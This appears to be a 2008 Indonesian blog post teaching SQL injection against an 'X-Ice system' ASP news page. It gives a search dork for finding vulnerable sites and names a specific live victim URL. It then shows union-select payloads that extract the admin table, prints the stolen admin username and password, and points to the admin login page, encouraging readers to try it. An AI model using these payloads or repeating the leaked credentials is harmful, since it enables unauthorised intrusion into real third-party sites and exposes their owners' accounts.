Untuk mencari targetnya, silahkan menggunakan keyword yang tepat ...
ex : inurl:/devami.asp?id= geri
Korban yang saya dapatkan adalah :
http://www.radyopinarim.com/haber1/devami.asp?id=1
Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini
Microsoft OLE DB Provider for ODBC Drivers hata '80040e14'
[Microsoft][ODBC Microsoft Access Sürücüsü] 'id=' sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)
/haber1/devami.asp, satýr 8
Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan
-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
Yang saya dapatkan usernamenya adalah Kadrius
dan untuk mencari passwordnya
:
-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
passwordnya adalah 19901990
Untuk login sebagai admin anda tinggal balik kehalaman
/admin/kontrol.asp
Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih.
Senin, 28 Juli 2008
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar